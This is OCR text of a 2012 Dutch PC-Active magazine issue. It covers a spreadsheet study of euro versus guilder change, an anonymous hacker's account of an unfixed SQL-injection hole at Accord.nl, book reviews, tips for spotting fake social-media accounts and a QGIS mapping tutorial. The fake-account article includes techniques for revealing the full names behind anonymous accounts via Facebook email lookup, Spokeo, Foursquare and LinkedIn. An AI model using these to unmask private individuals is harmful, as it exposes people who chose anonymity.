Prachtige scenery
PC-ACTIVE | Nr. 262 – 2012
MS Flight.indd 33
33
9/6/12 5:39 PM
WELK SYSTEEM IS BETER?
EURO VS. GULDEN TEKST : HENK VAN DE K AMER
Hoewel we alweer ruim tien jaar met de euro betalen, wil onder anderen Geert Wilders de gulden laten terugkeren. Zou de middenstand dan ook minder last hebben van kassa’s vol wisselgeld? Het is lastig wiskundig te bewijzen, maar met een spreadsheet komen we een heel eind...
O
nlangs had ik een discussie met een winkelier. Net als Geert Wilders zag hij de gulden graag terugkeren, maar dan wel om een heel persoonlijke reden: door de euro was er volgens hem veel meer wisselgeld in de kassa nodig. Onze gulden was inderdaad bijzonder, omdat hij was gebaseerd op kwarten: 10, 25, 50 en dan 100. Het systeem is in 1818 ontstaan op advies van de wiskundige Jean Henri van Swinden. Op 2 december 1815 leverde hij een 73 pagina’s tellend rapport in bij koning Willem I met als titel ‘Bedenkingen over het muntwezen’ [1].
34
Helaas is dat historische rapport niet online te vinden, want persoonlijk ben ik erg nieuwsgierig naar zijn argumenten. Bijna alle andere munten gebruiken namelijk de verdeling 10, 20, 50 en dan 100. Onze euro is geen uitzondering en toenmalig directeur Duisenberg van De Nederlandsche Bank vond het dan ook niet vreemd dat ons systeem van kwarten het niet heeft gehaald [2].
Subtiel Het verschil tussen beide systemen is subtiel. Bij de kwarten gebruiken we als factoren de reeks 2,5 - 2 - 2
PC-ACTIVE | Nr. 262 – 2012
Euro versus gulden.indd 34
9/6/12 10:24 AM
Euro vs. gulden
en bij de euro is dat dus 2 - 2,5 - 2. De gulden heeft door de eeuwen heen wel wat gezwalkt. Mogelijk dat een paar van onze oudste lezers nog met een halve cent of oortje, halve stuiver of halve gulden hebben betaald. Deze verdwenen in 1948 uit onze portemonnee [2]. Verder kregen we pas in 1982 een vijftigguldenbiljet en introduceerde De Nederlandsche Bank op 7 januari 1986 het biljet van 250 gulden [3]. Tot een biljet met de waarde van 500 gulden is het nooit gekomen. Wat dat betreft doet de euro het een stuk beter met een complete reeks van 1 eurocent tot een biljet van 500 euro. Omdat het verschil tussen de indelingen subtiel is, zegt ons gevoel dat de verschillen in hoeveelheden wisselgeld minimaal zullen zijn. Het probleem is dat gevoel geen basis is voor een bewijs! Ik heb daarom Calc - het spreadsheet uit de LibreOffice-suite - geopend om te zien of ik de claim van de winkelier kan ontkrachten of juist bevestigen. De gebruikte functies en technieken zijn ook te vinden in Excel of andere spreadsheetprogramma’s. Mogelijk dat de functies een andere naam hebben, maar die verschillen zien we ook al tussen de Nederlandse en Engelse versie van Calc. Wie er niet uitkomt, kan altijd ons spreadsheet [4] inlezen en zo kijken hoe de functie in uw versie heet. En mocht u helemaal op safe willen spelen, dan kunt u ook Portable Apps [5] installeren en net als ik met Calc aan de slag gaan.
Hele getallen Wie de wekelijkse boodschappen contant betaalt, zal meestal een pinautomaat gebruiken. Zodra het om wat grotere bedragen gaat, komen er in de meeste gevallen vijftigeurobiljetten uit. Ik ga er vanuit dat het voor 2002 in het geval van grotere pinbedragen om biljetten van 50 gulden ging, dus mijn eerste stap richting een bewijs is kijken hoeveel munten en biljetten ik nodig heb om alle gehele bedragen tot en met 49 neer te tellen. In cel A2 zet ik het getal 1 en in A3 plaats ik de volgende formule: =A2+1 Deze formule kopieer ik naar de cellen A3 tot en met A50. Een goed spreadsheetprogramma zal de formules tijdens het kopiëren slim aanpassen. Als we cel A3 naar A4 kopiëren, wordt de A2 vervangen door A3. En stel dat we A3 kopiëren naar cel B3, dan wordt de A2 in de formule vervangen door B2. Indien we deze intelligentie niet willen, moeten we een $ plaatsen in de formule voor de kolom of rijaanduiding. Als we in onze formule dus $A2 hebben gebruikt, komt in cel A4 de formule =$A3+1 te staan en in cel B3 wordt dat =$A2+1. U had ook A$2 kunnen gebruiken en in dat geval waren de formules respectievelijk =A$2+1 en =B$2+1 geworden. De volgende stap is het bedrag ontleden in zo weinig mogelijk munten en biljetten. Dat
| Achtergrond
gaat het handigst door te beginnen met de grootste waarde - 20 bij de euro en 25 bij de gulden - en dan te kijken hoeveel we daarvan nodig hebben. Omdat de waarde verschilt, plaatsen we deze in cel B1. Met de B$1-constructie kunnen we onze formules weer slim kopiëren: =ALS(A2>=B$1;GEHEEL(A2/B$1;0);0) Het ziet er wat complex uit, maar het is eigenlijk niet zo ingewikkeld. De ALS-constructie maakt het onderscheid tussen twee mogelijke situaties: het bedrag dat we willen teruggeven, is groter dan of gelijk aan het getal waarmee we bezig zijn. In het eerste geval berekenen we het aantal biljetten of munten met deze waarde en in het tweede geval is het aantal natuurlijk nul. Voor de volgende waarde hebben we het bedrag nodig dat overblijft en die formule is simpel: =A2-B2*B$1 De formules die we nu in cel B2 en C2 hebben gemaakt, kunnen we kopiëren in het blok B2:K50. Dankzij de $ gaat dat goed, mits we in de cellen D1, F1, H1 en J1 de juiste waardes van de biljetten en munten zetten, uiteraard in aflopende volgorde.
Tellen Als u alles goed hebt gedaan, moeten de waardes in de K-kolom allemaal nul zijn geworden. Bij de gulden gaat dat goed als u ook de kwartjes meeneemt in de vorm van het getal 0,25. Daarvoor is een extra tweetal kolommen nodig omdat we zes waarden - 25, 10, 5, 2,5, 1 en 0,25 - gebruiken in plaats van vijf - 20, 10, 5, 2, 1 - bij de euro. Die kwartjes zijn nodig omdat u af en toe een rijksdaalder teruggeeft. In de cel L2 gaan we tellen hoeveel biljetten en munten er nodig zijn voor het bedrag in cel A2: =B2+D2+F2+H2+J2 Voor de gulden breidt u de formule natuurlijk uit met L2. Tot slot tellen we na het kopiëren het totale aantal munten voor alle bedragen met de SOM-functie. Hierboven gaf ik al aan dat voor de gulden een extra nominatie nodig is in de kassa, dus dat is al een eerste pluspuntje voor de euro. Voor alle gehele bedragen van 1 tot en met 49 hebben we met de euro 145 - ofwel gemiddeld 2,96 - biljetten/munten nodig tegen 185 gemiddeld dus 3,78 - voor de gulden. Bij deze laatste munteenheid kunnen we besluiten om de rijksdaalder weg te laten, want bij gehele bedragen moeten we dan weliswaar iets meer guldens teruggeven, maar komen we uiteindelijk toch weer op 185 uit. Indien Geert Wilders het voor elkaar krijgt om terug te keren naar de gulden, zou het handig zijn om meteen weer de halve gulden in te voeren. Want in combinatie met de rijksdaalder daalt het aantal dan opeens naar 165. Nog steeds slechter dan de euro, maar toch...
PC-ACTIVE | Nr. 262 – 2012
Euro versus gulden.indd 35
35
9/6/12 10:24 AM
ACHTERGROND
| EURO VS. GULDEN
Afronden
Verklaring?
De eerste slag is duidelijk gewonnen door de euro, maar in de praktijk rekenen we niet af op hele bedragen. In Nederland verdwenen al vrij snel munten van 1 en 2 eurocent en wordt een eindbedrag op 1, 2, 6 en 7 afgerond naar beneden, en op 3, 4, 8 en 9 naar boven. Als alle mogelijke cijfers in eindbedragen gemiddeld even vaak voorkomen, is dit systeem eerlijk voor zowel klanten als winkeliers. In cel A2 beginnen we daarom met 0,05 en in A3 plaatsen we de formule: =A2+0,05
Het gevonden resultaat verbaast mij niet echt. Zoals gezegd is de serie 10, 20, 50 en dan 100 veel gebruikelijker dan het systeem dat bij de gulden werd gehanteerd. Er is vast een wiskundige die dit ook kan bewijzen. En alhoewel ik dat niet kan, vermoed ik dat het bewijs mogelijk heeft te maken met het feit dat we een factor 10 willen opdelen in twee tussenstappen. Ofwel x3 = 10 en dat geeft een x van 2,15 en een serie van 10 - 21,5 - 46,2 - 100. De afronding naar 20 bij de euro is dan gewoon dichter bij de perfecte opdeling dan de 25 bij de gulden. Voordat lezers boze e-mails gaan sturen dat de bevinding van de winkelier echt klopt, heb ik nog één uitweg bedacht. In winkels wordt gekozen voor psychologisch leuke bedragen. De PC-Active die u nu in handen hebt, kost niet zeven euro maar slechts € 6,99. Nu is het mogelijk dat bepaalde bedragen uit de 5 centreeks daardoor vaker moeten worden teruggegeven dan andere. Om dat uit te sluiten zou ik eigenlijk een lijst moeten hebben van alle transacties in een bepaalde winkel om zo te zien of alle mogelijke drie cijfers op het einde gemiddeld even vaak voorkomen. Helaas heb ik niet de beschikking over zo’n lijst, maar als een lezer/winkelier mij die wil geven - voor een betrouwbare analyse zijn er vermoedelijk minimaal tienduizend transacties nodig - kan daarmee het definitieve antwoord worden gegeven.
Vervolgens kopiëren we dit tot en met A100, waarmee we de bedragen 0,05 tot en met 4,95 hebben. Vanaf dat punt kunnen we met biljetten teruggeven, al was het briefje van vijf de laatste jaren van zijn leven vervangen door een onhandige munt. De formule in cel B2 en consorten blijft ondanks de gebroken getallen hetzelfde. Echter, als we in cel C2 en consorten de eerder getoonde berekening gebruiken, ziet u in de laatste kolom regelmatig nog de eindwaarde 0,05 staan. Na heel veel puzzelen ontdekten we dat het getal 0,0499999999999999 door tussentijdse afrondingen overbleef en dat is inderdaad net geen stuiver. We moeten het systeem dus tussentijds dwingen om weer twee cijfers achter de komma te gebruiken en daarmee wordt de formule: =AFRONDEN(I2-J2*J$1;2) Het resultaat van alle berekeningen valt wederom in het voordeel van de euro uit: 291 munten versus 380 voor de gulden. Ook hier geldt weer: mochten we de gulden weer invoeren, dan nemen we het beste ook de halve gulden meteen weer mee. Want daarmee daalt het benodigde aantal tot 301 stuks.
36
INFOLINK 262010
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262010
PC-ACTIVE | Nr. 262 – 2012
Euro versus gulden.indd 36
9/6/12 10:24 AM
HET DOSSIER VAN HACKER: ??? TEKST : BRENNO DE WINTER
Vaak kiezen hackers een online naam voor hun werkzaamheden om daarmee successen te kunnen claimen. Maar soms kaarten ze iets aan op voorwaarde van anonimiteit. Een voorbeeld daarvan was de hacker van uitzendketen Accord.nl.
B
egin van deze zomer werd bekend dat een vermoedelijk Belgische vrouw had ingebroken bij de uitzendketen Accord.nl. Daarbij waren duizenden gegevens van uitzendkrachten buitgemaakt. In sommige gevallen bleek de informatie al jaren oud. Het bedrijf wilde zich niet laten afpersen en de gegevens verschenen op het internet. De site werd gefikst en dat leek het einde van het verhaal.
Anoniempje Maar niets bleek minder waar. Een bron meldde zich bij ons met het nieuws dat hij de hele database in een oogwenk weer zou kunnen ophalen. Met behulp van… exact hetzelfde lek. Vervelend voor de getroffenen, want zo blijft de website voor vakantiewerkers een risico. “Ik wil niet met naam bekend zijn,” liet de hacker ons weten. Ook een pseudoniem was uit den boze. Hij omschreef zijn rol als volgt: “De tip werd gegeven en verder bleef de persoon buiten het verhaal.”
Gebrekkige beveiliging In gesprek met PC-Active maakte hij duidelijk zich vooral kwaad te maken over gebrekkige beveiliging. “Overal laten we persoonsgegevens achter en niemand wil dat beschermen,” zei de persoon. Met een geïrriteerd gezicht legde hij uit kwaad te zijn dat mensen worden gezien als digitale handelswaar. “Wel roepen dat privacy belangrijk is en er niets aan doen.”
Privacy Dat hij zelf geen identiteit claimt, heeft ook met privacy te maken. “Het gaat om het oplossen van het probleem en niet om mij. Overigens was dit zo simpel dat iedereen dit kon doen.” Toch was het niet alleen
een roep om privacy. De persoon was bezorgd om de gevolgen van een hack. De angst voor justitie zit er behoorlijk in. Daarom zal de klokkenluider niet snel gaan samenwerken met de overheid of lekken direct aan bedrijven melden. Het risico dat zoiets verkeerd afloopt, wil hij niet lopen. Hij heeft er bovendien helemaal geen vertrouwen in dat ondernemingen na een waarschuwing goed omgaan met de problemen. “Het bedrijf gaat het lek dan in stilte oplossen en dan is het voor sommige mensen al te laat. Hun gegevens zijn al gelekt.”
Geen nerd De woede lijkt voort te komen uit echte betrokkenheid. Dat bleek ook wel toen we vragen stelden over de achtergrond van de persoon. Eigenlijk had hij helemaal geen expertise in de ICT; hij doet iets heel anders in het dagelijks leven. Als hobby en verdiepingsslag heeft hij zich het uitbuiten van SQL-injection zwakheden eigen gemaakt. “Ik ben helemaal niet zo goed met computers, maar dit was wel heel simpel.” Doorvragend op zijn aanpak bleek hij zich goed bewust van de risico’s en zijn sporen toch te kunnen verbergen. “Dat lijkt me logisch; anders ben ik geen anonieme bron.” Het wekt geen verbazing dat hij ook een foto van zijn hand weigerde, waarmee we deze rubriek gewoonlijk illustreren.
PC-ACTIVE | Nr. 262 – 2012
Dossier hacker.indd 37
37
9/6/12 10:31 AM
ALGEMEEN
| BOEKEN
BOEKEN TEKST : WAMMES WITKOP
Inside Cyber Warfare Typisch zo’n onderwerp waar iedereen een mening over debiteert, maar waarvan slechts weinigen echt weten waar het om draait: cyberoorlog. En diegenen die goed ingevoerd zijn in dit veld laten eigenlijk nooit wat van zich horen; het is inderdaad een hoogst actuele wapenwedloop. Een serieus boek met de nodige casestudy’s, analyses en praktische doorkijkjes is dan ook zeer leerzaam. Inside Cyber Warfare is een vondst en verplicht leesvoer voor iedereen die meent zonder de nodige achtergrondkennis mee te mogen zingen in het koor der verontrusten. Zelf zou ik er voor zijn onmiddellijk honderdvijftig exemplaren van staatswege naar de Tweede Kamer te laten sturen, maar dan wel met een korte overhoring, een maandje later, zodat de wat taaie stof geen excuus vormt om het boek links te laten liggen. Uiterst leesbaar, spannend zo hier en daar zelfs, brengt de schrijver de cyberonderwereld in kaart. De
vissende criminelen, de hackers van staatswege, het ontstaan van Anonymous, de rol van social media in de Arabische Lente, allemaal zaken die ons allemaal dagelijks raken en die de komende jaren alleen nog maar meer invloed zullen krijgen op ons dagelijks leven. Ook de - nogal vanuit een USA-standpunt geformuleerde - speculaties over de Chinese IT-industrie zijn op z’n zachtst gezegd verontrustend. We leven in interessante tijden. En dan kan je beter goed beslagen ten ijs komen.
Inside Cyber Warfare Auteur: Jeffrey Carr Uitgever: O’Reilly Engelstalig, 318 pagina’s, softcover ISBN: 978-1-4493-1004-2 Prijs: € 30,95 (pdf of ePub: € 24,95)
Fitness for Geeks De meeste fitnessfanaten maken zich erg druk zonder nu precies te weten waarom ze nu precies wat aan het doen zijn. En voor geeks - zoals u en ik - werkt dat nu eenmaal niet. Leg mij nu eens wetenschappelijk onderbouwd uit waarom de ene maaltijd beter is dan de andere, zonder meteen in gemeenplaatsen en veralgemeniseringen te vervallen, en de kans dat ik
Fitness for Geeks Auteur: Bruce W. Perry Uitgever: O’Reilly Engelstalig, 336 pagina’s, softcover ISBN: 978-1-4493-9989-4 Prijs: € 27,45 (pdf of ePub: € 21,95)
38
Boeken.indd 38
begrijpend luister en vervolgens handel is vele malen groter. Dat gezegd hebbende kan dit boek me nog zuur opbreken… Want hier worden zaken wel onderbouwd op een manier waar een goeie bèta mee uit de voeten kan. Weliswaar op nogal Amerikaanse leest geschoeid; zo is de pizzapunt die cijfermatig wordt uitgeplozen er eentje met pepperoni en zijn de ingrediëntenlijstjes van verpakkingen ook net anders dan we gewend zijn, maar de denkwijze is natuurlijk wel wetenschappelijk. Voedsel, vitaminen, mineralen, eetritmes en ook oefeningen komen uitgebreid aan bod. Maar dan wel met de nodige technische invalshoeken. De gps-mogelijkheden van de smartphone blijken prima bruikbaar om de fitnesswandelingen bij te houden, terwijl er heel wat handige apps blijken te bestaan voor wie zich druk wil of moet maken over de leefstijl. Aanrader - maar mogelijk niet voor mij…
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:32 AM
BOEKEN
Fotograferen met een Canon 650D De zoveelste loot aan de onderhand fiks uitgegroeide reeks Fotograferen met een Canon xxx - het zijn er onderhand zeker zes - biedt weinig verrassends. Dat hoeft ook niet, want deze boeken zijn in feite een uitgebreide gebruiksaanwijzing met veel heldere voorbeelden, zowel voor de camera zelf als voor digitale spiegelreflexfotografie in het algemeen. Wie al wat weet van digitale fotografie, heeft weinig aan dit boek. Wie geen Canon 650D heeft, doet er ook beter aan ander leesvoer te zoeken. Maar wie begint met fotograferen en dit model camera heeft aangeschaft, kan zich geen betere begeleider voor die eerste stappen wensen! En mocht u een andere Canon bezitten, zoek even op het internet; de auteur heeft zowat alle recente modellen van een bijbehorend boek voorzien.
| ALGEMEEN
Fotograferen met een Canon 650D Auteur: Jeroen Horlings Uitgever: Pearson Benelux Nederlandstalig, 160 pagina’s, softcover ISBN: 978-90-430-2707-6 Prijs: € 19,95 (pdf: € 14,95)
Geen Canon? Dezelfde stof, maar dan nog wat verder uitgewerkt, is door de schrijver ook in niet-cameraspecifieke vorm gegoten. ’t Is allemaal niet bijster creatief - maar wel uitermate afdoende. Vooral de vele goed gefotografeerde voorbeelden brengen de stof tot leven!
Computer Basisboeken - Aldi-uitgave Soms trekt iets de aandacht - zoals een aanbieding van Aldi met een hele reeks Computer Basisboeken. Een tocht naar de discounter leverde fikse stapels van een stuk of vijf titels in de aanbiedingsbakken op en liever dan de caissière uitleggen dat ze gratis mee moesten voor recensies zijn er maar drie relevante werkjes aangeschaft. Voor de prijs - € 3,99 per stuk hoefden we ze niet te laten liggen. Overigens vonden we dezelfde titels bij de uitgeverij zelf op http:// www.cd-id.nl/ in de aanbieding voor € 6,95 exclusief verzendkosten. Deze speciale oplage voor de Aldi is inderdaad zeer betaalbaar. Maar het spreekwoord luidt ‘alle waar is naar zijn geld’ - en dat gaat ook in dit geval wel enigszins op. Want hoewel de drie bekeken boeken keurig zijn uitgevoerd, geheel in kleur, prima papier, zowel de schrijfstijl - “zieke computers hoesten natuurlijk niet” - als het niveau zijn duidelijk voor een andere doelgroep bestemd. Wie last heeft van familie of kennissen die met de meest simpele vragen uw tijd komen verspillen, doet er goed aan de eerstvolgende keer dat Aldi deze reeks in de bakken dondert snel toe te slaan en er even een cadeaupapiertje omheen te doen. Maar voor uzelf, vooral stil laten liggen…
Computer Basisboeken Windows 7, Office 2010, Digitale fotografie Auteur: Bart Uhde Uitgever: cd/id mulitimedia Nederlandstalig, 288 pagina’s, softcover Windows 7 ISBN: 978-90-480-0281-8 Office 2010 ISBN: 978-90-480-0284-9 Digitale fotografie ISBN: 978-90-480-0282-5 Prijs: € 3,99 – en Aldi rekent in centen af! PC-ACTIVE | Nr. 262 – 2012
Boeken.indd 39
39
9/6/12 10:33 AM
Tips en trucs voor sociale media
Ontmasker fakers! tekst : henk van ess
In sociale media zijn mensen niet altijd wie ze zeggen dat ze zijn. Hoe stelt u vast wie iemand is? Ontmasker beroemde, beruchte en onbekende mensen met deze tips van Henk van Ess.
I
s @MaozeDong op Twitter de echte Mao Zedong? Natuurlijk niet. De Chinese leider was ver voor de komst van het moderne internet al overleden. Lastiger is het om vast te stellen of @oprahwinfry, @bpglobalpr en @matthvnieuwkerk kloppen. Zijn het echt Oprah Winfrey, oliemaatschappij BP en presentator Matthijs van Nieuwkerk? In dit artikel geven we u tips voor het valideren van beroemde, bekende en onbekende mensen in sociale media. Maak gebruik van uw gezond verstand en speciale tools, maar luister ook naar wat anderen beweren.
Beroemde mensen valideren Ga eerst naar de website van de bekende persoon. Meestal staat onder het kopje Contact of hij of zij actief
Meer aflezen van Twitter Besloten accounts op Twitter hebben een slotje. U komt in eerste instantie nooit te weten wat iemand zegt. Toch valt met wat zoekwerk nog heel wat te herleiden. Niet iedereen weet dit, maar foto’s van een besloten Twitteraccount blijven bewaard in databases van diensten als Mobypicture, TwitPic of YFrog. Daardoor krijgt u alsnog te zien wat een anoniem persoon voor foto’s heeft gemaakt, meestal met de bijbehorende tweet. Twitter houdt foto’s gewoonlijk maar een paar maanden vast. Via Twicsy [5] kunt u de foto’s in één keer doorzoeken en veel verder terugkijken, wat extra informatie kan geven over een onbekend persoon. Een tweede tip: vul in het zoekveld van Twitter to: in, gevolgd door de naam van de onbekende persoon. Het is alsof u een half telefoongesprek beluistert: u leest alleen wat mensen tegen deze twitteraar zeggen, niet wat deze antwoordt. Ook dat kan helpen bij het bepalen van de identiteit.
40
is in sociale media. Vaak staat er ook een logo van Facebook of Twitter op de homepage. Wie is de echte Marco Borsato op Twitter? Is dat @marcoborsato of @ borsato? Kijk naar de naam die de bekende persoon zelf geeft op zijn site. In dit geval ziet u dat Marco Borsato naar @borsato verwijst. Het account @marcoborsato is nep. Verder ziet u op Twitter af en toe Verified Account bij de naam van een persoon staan, met een blauw vinkje erbij. Ook dit geeft u houvast dat de identiteit klopt. Ook de populariteit van een account is veelzeggend. Laten we drie Borsato’s op Facebook als voorbeeld nemen: marco.borsato, borsato en ook borsato.marco. Wie is de echte? Is het de man met een pistool als afbeelding? Hoe komt u dat te weten als de artiest zelf geen verwijzing heeft naar zijn eigen Facebookaccount? Houvast geeft het aantal likes en talking about this. Die aantallen bestaan bij beroemdheden doorgaans uit vijf cijfers of meer, dus minimaal tienduizend. Zaligmakend is dat niet altijd, zoals u bij de volgende tip zult zien.
Zoek De Zuid-Koreaanse artieste Kim Tae Hee had op Facebook juist heel veel likes en toch bleek het account nep. Het loont de moeite even te googelen. Tik bij twijfel over accounts van bekende mensen de (bij-) naam en het woord fake. Bijvoorbeeld: fake facebook kim tae hee Fake @bpglobalpr Had u dit ook met @oprahwinfry en @matthvnieuwkerk gedaan, dan had u meteen gezien dat veel andere
PC-ACTIVE | Nr. 262 – 2012
Nep sociale media.indd 40
9/6/12 10:33 AM
NEPPROFIELEN
| ACHTERGROND
mensen beweerden dat de accounts niet afkomstig waren van het origineel.
Beruchte mensen valideren In april 2011, kort na de schietpartij in een winkelcentrum in Alphen aan den Rijn, verscheen Figuur 1 op het net. Iemand zei de foto van de verdachte te hebben gevonden via een profiel op Hyves. Hoe controleert u of dit werkelijk Tristan van der Vlis was? Google Images [1] kan uw helper zijn. Ga naar http://images.google. com/. Klik op het blauwe fototoestelletje rechts in de zoekbox. Kopieer nu de link naar de te onderzoeken foto in de witte zoekbox. U kunt ook een foto vanaf uw harde schijf uploaden. Google analyseert de foto en voorspelt de zoektermen die bij de foto horen. Het blijkt om een Amerikaanse acteur te gaan en niet om de schutter in Alphen aan den Rijn. U weet vrijwel zeker dat u voor de gek bent gehouden. Ook de Amerikaanse zoekmachine TinEye [2] helpt u de herkomst van foto’s te valideren. De werking is vrijwel hetzelfde als die van Google.
Onbekende personen valideren Er bestaat geen zoekmachine die honderd procent zekerheid biedt over waar mensen zoal uithangen in sociale media. Maar u kunt wel een poging wagen met Spokeo [3]. Deze tool neemt u vooral werk uit handen: het kijkt of een bepaalde nickname ook nog in andere sociale netwerken is te vinden. Ga naar Username en vul de nick precies zo in als u deze ziet in sociale media, dus inclusief soms vervelende tekens als _ of 103813001. In dit voorbeeld onderzoek ik mijzelf. Zogenaamd weet ik alleen van mijzelf dat ik op Twitter @henkvaness heet. Spokeo gaat nu proberen om mij in andere netwerken op te sporen. De zoekmachine weet de bijnaam in veertien netwerken te vinden - niet slecht. Doorloop de bronnen om te zien of de persoon nog meer nicks heeft achtergelaten. Die laat u dan weer elk afzonderlijk door Spokeo bekijken. Wees alert als u van een onbekend persoon via Spokeo een koppeling krijgt te zien
Figuur 2: Iemand wil anoniem blijven
naar Foursquare, een geolocatiedienst. U hebt dan een aardige kans om de volledige naam van de persoon te achterhalen. Een voorbeeld: op Twitter vindt u het account Studio K Live. U wilt weten wie achter deze bijnaam zit. Ga naar Spokeo en daar krijgt u een koppeling te zien naar Foursquare. U ziet daardoor al de mogelijke voornaam van de persoon, Vitor. De geolocatiedienst heeft vaak ook een koppeling met Facebook. Klik op het F-icoon en u krijgt de volledige naam - die we hier uit privacyoverwegingen niet noemen. Beschikt u over Gmail? Dan loont het de moeite om Rapportive [4] te installeren. Hiermee krijgt u in één oogopslag te zien in welke sociale netwerken een onbekende mailer zit.
Onbekenden in sociale media Op Facebook ontvangt u uit Californië een verzoek om vrienden te worden op Facebook. Het gaat om het bedrijf ‘365 things to do in Santa Cruz California’. U kent maar één persoon in Santa Cruz, een oppervlakkige maar aardige kennis met het mailadres
[email protected]. Tik dit mailadres rechtstreeks in Facebook in. U ziet dat de website opeens de identiteit van het account prijsgeeft. Kortom, weet u iemands mailadres - of kunt u het raden - dan doet Facebook de rest. Maar hoe zit het met mensen die anoniem willen blijven op LinkedIn? Doordat Google de personen in LinkedIn anders indexeert, komt heel vaak toch de volledige naam tevoorschijn. Stel, u komt het scherm uit Figuur 2 tegen. Kopieer een paar eerdere functies van de anonieme persoon in Google. Klik op het resultaat en u ziet zijn profiel met naam. Kortom, de wereld van sociale media is verleidelijk, soms zelfs zo verleidelijk dat oplichters u in de val laten lopen. We hopen dat u met deze tips wat prettiger en veiliger zult omgaan met sociale media.
INFOLINK 262011
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262011 Figuur 1: Tristan van der V. of toch niet?
PC-ACTIVE | Nr. 262 – 2012
Nep sociale media.indd 41
41
9/6/12 10:33 AM
BRUGGEN AMSTERDAM IN KAART
GEODATA TEKST : WIM BL ANKEN
Met geo-informatie kunt u tal van databases op een overzichtelijke manier op een kaart zetten. In een eerder artikel gaven we u de theorie. Nu de praktijk: een mooie kaart met Amsterdamse bruggen.
P
C-Active-lezers houden van kaarten! Dat blijkt wel uit het aantal enthousiaste reacties dat we mochten ontvangen op het artikel ‘Open kaart, Spelen met geodata’ in PCActive # 260 van juli/augustus 2012. In dat artikel hebben we het programma Quantum GIS (QGIS) geïntroduceerd [1], waarin diverse externe bronnen van geo-informatie op de kaart zijn gezet. Wel liep een aantal lezers af en toe vast tijdens het ontsluiten van eigen informatie. In het onderhavige artikel zullen we dan ook - in tegenstelling tot de vorige keer - demonstreren hoe eenvoudig u uw eigen informatie in kaart kunt brengen. We gaan opnieuw aan de slag met de applicatie Quantum GIS of QGIS. Die keus is niet zo moeilijk, aangezien deze applicatie gratis beschikbaar is en daarnaast ook nog ondersteuning biedt voor een groot aantal uiteenlopende bestandsformaten. We zoomen in dit artikel in op onze hoofdstad Amsterdam. In sneltreinvaart zullen we hier drie datasets in beeld brengen, namelijk een Microsoft Access-database met bruggen, een stadswandeling in de vorm van een gps-bestand en een Microsoft Excel-bestand met scholen die we door middel van een macro automatisch kunnen voorzien van adreslocaties. Op basis van het geleerde kunt u vervolgens zelf aan slag met uw eigen adressen- of gps-bestand!
42
Geodata.indd 42
Nieuwe versie QGIS Sinds het eerdere artikel is er een nieuwe versie van QGIS voor Windows beschikbaar gekomen [2]. Hoewel we ditmaal gebruikmaken van deze nieuwe versie, 1.8.0, is alle gebruikte functionaliteit ook voorhanden in de vorige versie, 1.7.4. Wel is het mogelijk dat opdrachten op een andere plaats in de menustructuur zijn ondergebracht. Daarnaast krijgt u met versie 1.8.0 ook de beschikking over de Quantum GIS Browser. De functionaliteit hiervan lijkt een beetje op die van de Windows Verkenner. U kunt er onder meer geodata mee bekijken. In deze workshop maken we echter enkel gebruik van de Quantum GIS Desktopapplicatie. Na het installeren of updaten kunt u QGIS starten vanuit het Startmenu. Kies daarbij voor de applicatie Quantum GIS Desktop.
Bruggen in Amsterdam Lezer Cor de Ruiter stuurde ons een Microsoft Accessdatabase met informatie over bruggen in Amsterdam en vroeg zich af of het mogelijk is deze bruggen op de kaart te zetten. Bij het bestuderen van de tabel viel al meteen op dat de locatie van de bouwwerken keurig aanwezig is in de vorm van twee afzonderlijke kolommen met XY-coördinaten. Oftewel, het betreft hier geo-informatie die op de kaart kan worden gezet! U kunt voor deze workshop een zipfile downloaden
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:36 AM
GEODATA
met daarin alle voorbeelden, waaronder de MS Access-database en een basisproject met de naam workshop.qgs [3]. Dit project is al voorzien van het juiste coördinatenstelsel en een achtergrondkaart die als service van het samenwerkingsprogramma Publieke Dienstverlening op de Kaart (PDOK) beschikbaar is op het internet. Pak het archief uit en open het project workshop.qgs in QGIS via de menuoptie Bestand en Open project. Vervolgens kiest u in het menu Beeld voor de optie Tile schaalschuif en klikt u één keer met de linkermuisknop in de linker lagenlijst op de kaartlaag brtachtergrondkaart. Hiermee zorgt u ervoor dat de achtergrondkaart als service bij het in- en uitzoomen altijd scherp wordt weergegeven. Let maar eens op de schuifbalk rechts van de kaart als u met het muiswiel de schaal van de kaart groter of kleiner maakt. De basis is er nu voor het toevoegen van de bruggen in Amsterdam.
| ACHTERGROND
over een plug-in die dit mogelijk maakt! Wel is het noodzakelijk dat de database is opgeslagen met de MDB-bestandsindeling en dus niet in de nieuwe ACCDB-indeling. Vanaf MS Access-versie 2007 kunt u overigens altijd een ACCDB-database omzetten naar een MDB-database. De QGIS plug-in die we gaan gebruiken, heet eVis [4] en is, afhankelijk van de QGIS-versie, te vinden in het menu Database of het menu Plug-ins. Kies voor eVis/ eVis Database Connection. Kies in het nieuwe venster voor de optie MSAccess in het dropdown-menu Database Type. Vervolgens selecteert u bij Database naam de database bruggen.mdb vanuit de directory database en klikt u op Verbinden. Hiermee hebt u een connectie gemaakt met de database. Klik op het verticale tabblad met de naam SQL query en voer de volgende tekst in: SELECT * FROM BRUGGEN. Klik daarna op Voer query uit. Geef de kaartlaag de naam bruggen en voer de twee velden met X- en Y-coordinaten in. U dient hierbij respectievelijk te kiezen voor de velden met de namen X en Y. Klik daarna op OK. Als het goed is, staat de projectie in het vervolgscherm standaard op Amersfoort/RD New en kunt u volstaan met het klikken op OK. Vervolgens kunt u het eVis-venster ook sluiten met de OK-knop. Zoals u ziet, worden de bruggen in de kaart opgenomen. U kunt eventueel het bruggensymbool aanpassen in het stijlvenster, dat u kunt openen door twee keer met de linkermuisknop op de tekst bruggen te klikken in de lagenlijst. Ook kunt u informatie van de afzonderlijke bouwwerken in de kaart weergeven door gebruik te maken van de knop Objecten identificeren - het pijltje met de blauwe i - die standaard aanwezig is op de knoppenbalk. Om de bruggen te voorzien van een tekstlabel kiezen we voor de knop Labels (de ABC-knop). Vink daarbij de optie Deze laag labelen met aan en kies het veld Naam uit de dropdownbox. Klik tenslotte op OK. Een klein nadeel van de eVis-plug-in is dat u de informatie alleen kunt visualiseren en dus niet kunt wijzigen.
GPS op de kaart Steeds meer mensen maken gebruik van gps tijdens het wandelen en fietsen. Eveneens populair is de sport geocaching, waarbij deelnemers een schat moeten zien te vinden met behulp van een gps-ontvanger.
